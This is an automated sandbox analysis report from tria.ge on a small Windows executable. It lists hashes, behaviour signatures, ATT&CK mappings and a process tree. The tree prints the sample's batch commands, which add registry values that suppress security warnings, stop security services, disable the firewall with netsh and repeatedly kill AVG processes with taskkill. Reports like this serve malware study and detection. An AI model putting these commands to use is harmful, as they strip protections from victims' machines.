Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
12/07/2024, 14:05
Static task
static1
Behavioral task
behavioral1
Sample
3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe
Resource
win10v2004-20240709-en
General
-
Target
3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe
-
Size
36KB
-
MD5
3dadd87327e92b402f5d02952eb256cf
-
SHA1
4dfc944c3cd1e1e7756b0975ce1212687848412b
-
SHA256
42a03a01291ad18b2f57364b99fedf6ecbdf97ef25416f64556757a3fc2760f2
-
SHA512
8451110acfb23cd19709a544e79e7e6d1b2207a7825cdd9d7067af01f5dd02a900275accdfe7f85daffa3bd2962a96d09b466b48d4f6acb8dc6fb969238d173f
-
SSDEEP
768:82gpFmvbXimSBlWRVJqYOF6dXm3jI3bOmcO:+KiYAF65m3jMcO
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" reg.exe -
Modifies Windows Firewall 2 TTPs 1 IoCs
pid Process 3056 netsh.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2776 sc.exe 2640 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Kills process with taskkill 24 IoCs
pid Process 2808 taskkill.exe 2196 taskkill.exe 764 taskkill.exe 2380 taskkill.exe 2412 taskkill.exe 2052 taskkill.exe 2000 taskkill.exe 944 taskkill.exe 584 taskkill.exe 2800 taskkill.exe 2900 taskkill.exe 620 taskkill.exe 924 taskkill.exe 2568 taskkill.exe 1980 taskkill.exe 1440 taskkill.exe 2028 taskkill.exe 2952 taskkill.exe 408 taskkill.exe 2300 taskkill.exe 1764 taskkill.exe 2908 taskkill.exe 2816 taskkill.exe 2852 taskkill.exe -
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 584 taskkill.exe Token: SeDebugPrivilege 2800 taskkill.exe Token: SeDebugPrivilege 1764 taskkill.exe Token: SeDebugPrivilege 2808 taskkill.exe Token: SeDebugPrivilege 2900 taskkill.exe Token: SeDebugPrivilege 2908 taskkill.exe Token: SeDebugPrivilege 2568 taskkill.exe Token: SeDebugPrivilege 2196 taskkill.exe Token: SeDebugPrivilege 620 taskkill.exe Token: SeDebugPrivilege 2816 taskkill.exe Token: SeDebugPrivilege 2852 taskkill.exe Token: SeDebugPrivilege 1980 taskkill.exe Token: SeDebugPrivilege 764 taskkill.exe Token: SeDebugPrivilege 2028 taskkill.exe Token: SeDebugPrivilege 2412 taskkill.exe Token: SeDebugPrivilege 2380 taskkill.exe Token: SeDebugPrivilege 2952 taskkill.exe Token: SeDebugPrivilege 2052 taskkill.exe Token: SeDebugPrivilege 2000 taskkill.exe Token: SeDebugPrivilege 1440 taskkill.exe Token: SeDebugPrivilege 408 taskkill.exe Token: SeDebugPrivilege 2300 taskkill.exe Token: SeDebugPrivilege 944 taskkill.exe Token: SeDebugPrivilege 924 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2636 wrote to memory of 2784 2636 3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe 30 PID 2636 wrote to memory of 2784 2636 3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe 30 PID 2636 wrote to memory of 2784 2636 3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe 30 PID 2636 wrote to memory of 2784 2636 3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe 30 PID 2784 wrote to memory of 2644 2784 cmd.exe 32 PID 2784 wrote to memory of 2644 2784 cmd.exe 32 PID 2784 wrote to memory of 2644 2784 cmd.exe 32 PID 2784 wrote to memory of 2644 2784 cmd.exe 32 PID 2784 wrote to memory of 2764 2784 cmd.exe 33 PID 2784 wrote to memory of 2764 2784 cmd.exe 33 PID 2784 wrote to memory of 2764 2784 cmd.exe 33 PID 2784 wrote to memory of 2764 2784 cmd.exe 33 PID 2784 wrote to memory of 2116 2784 cmd.exe 34 PID 2784 wrote to memory of 2116 2784 cmd.exe 34 PID 2784 wrote to memory of 2116 2784 cmd.exe 34 PID 2784 wrote to memory of 2116 2784 cmd.exe 34 PID 2784 wrote to memory of 2564 2784 cmd.exe 35 PID 2784 wrote to memory of 2564 2784 cmd.exe 35 PID 2784 wrote to memory of 2564 2784 cmd.exe 35 PID 2784 wrote to memory of 2564 2784 cmd.exe 35 PID 2564 wrote to memory of 2708 2564 net.exe 36 PID 2564 wrote to memory of 2708 2564 net.exe 36 PID 2564 wrote to memory of 2708 2564 net.exe 36 PID 2564 wrote to memory of 2708 2564 net.exe 36 PID 2784 wrote to memory of 2912 2784 cmd.exe 37 PID 2784 wrote to memory of 2912 2784 cmd.exe 37 PID 2784 wrote to memory of 2912 2784 cmd.exe 37 PID 2784 wrote to memory of 2912 2784 cmd.exe 37 PID 2912 wrote to memory of 2812 2912 net.exe 38 PID 2912 wrote to memory of 2812 2912 net.exe 38 PID 2912 wrote to memory of 2812 2912 net.exe 38 PID 2912 wrote to memory of 2812 2912 net.exe 38 PID 2784 wrote to memory of 2776 2784 cmd.exe 39 PID 2784 wrote to memory of 2776 2784 cmd.exe 39 PID 2784 wrote to memory of 2776 2784 cmd.exe 39 PID 2784 wrote to memory of 2776 2784 cmd.exe 39 PID 2784 wrote to memory of 3056 2784 cmd.exe 40 PID 2784 wrote to memory of 3056 2784 cmd.exe 40 PID 2784 wrote to memory of 3056 2784 cmd.exe 40 PID 2784 wrote to memory of 3056 2784 cmd.exe 40 PID 2784 wrote to memory of 2640 2784 cmd.exe 41 PID 2784 wrote to memory of 2640 2784 cmd.exe 41 PID 2784 wrote to memory of 2640 2784 cmd.exe 41 PID 2784 wrote to memory of 2640 2784 cmd.exe 41 PID 2784 wrote to memory of 584 2784 cmd.exe 42 PID 2784 wrote to memory of 584 2784 cmd.exe 42 PID 2784 wrote to memory of 584 2784 cmd.exe 42 PID 2784 wrote to memory of 584 2784 cmd.exe 42 PID 2784 wrote to memory of 2800 2784 cmd.exe 44 PID 2784 wrote to memory of 2800 2784 cmd.exe 44 PID 2784 wrote to memory of 2800 2784 cmd.exe 44 PID 2784 wrote to memory of 2800 2784 cmd.exe 44 PID 2784 wrote to memory of 1764 2784 cmd.exe 45 PID 2784 wrote to memory of 1764 2784 cmd.exe 45 PID 2784 wrote to memory of 1764 2784 cmd.exe 45 PID 2784 wrote to memory of 1764 2784 cmd.exe 45 PID 2784 wrote to memory of 2808 2784 cmd.exe 46 PID 2784 wrote to memory of 2808 2784 cmd.exe 46 PID 2784 wrote to memory of 2808 2784 cmd.exe 46 PID 2784 wrote to memory of 2808 2784 cmd.exe 46 PID 2784 wrote to memory of 2900 2784 cmd.exe 47 PID 2784 wrote to memory of 2900 2784 cmd.exe 47 PID 2784 wrote to memory of 2900 2784 cmd.exe 47 PID 2784 wrote to memory of 2900 2784 cmd.exe 47
Processes
-
C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3dadd87327e92b402f5d02952eb256cf_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\2AF.tmp\DESATIVAR ANTIVIRUS GERAL.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /f /v AntiVirusDisableNotify /t REG_DWORD /d 13⤵
- Windows security bypass
PID:2644
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /f /v FirewallDisableNotify /t REG_DWORD /d 13⤵
- Windows security bypass
PID:2764
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\software\microsoft\security center" /f /v UpdatesDisableNotify /t REG_DWORD /d 13⤵
- Windows security bypass
PID:2116
-
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:2708
-
-
-
C:\Windows\SysWOW64\net.exenet stop wscsvc3⤵
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wscsvc4⤵PID:2812
-
-
-
C:\Windows\SysWOW64\sc.exesc config wscsvc start= disabled3⤵
- Launches sc.exe
PID:2776
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3056
-
-
C:\Windows\SysWOW64\sc.exesc config antivirservice start= disabled3⤵
- Launches sc.exe
PID:2640
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgcsrvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgemc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgrsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgchsvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgnsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2900
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgwdsvc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgcsrvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgemc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgrsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:620
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgchsvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgnsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgwdsvc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgcsrvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:764
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgemc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgrsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgchsvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgnsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgwdsvc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgcsrvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgemc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgrsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgchsvx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgnsx.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:944
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im avgwdsvc.exe /t3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:924
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD55d8d11c356ba744b6954b9a5cb3a4618
SHA11eb904f7401929fcbdc7efbd9e33a674a7ccb17f
SHA2567ca23f66dcef0342d305d6c186614739312df87f27c26233b11aac54406fbd21
SHA512d8aa07044290308db09ca0c6bfa9d885f9ac16d3a6558a0cff84be609364833486f40a9ea25a2df347fa2d0c4ba4267a9e5fc37f733654314a212925675a5c58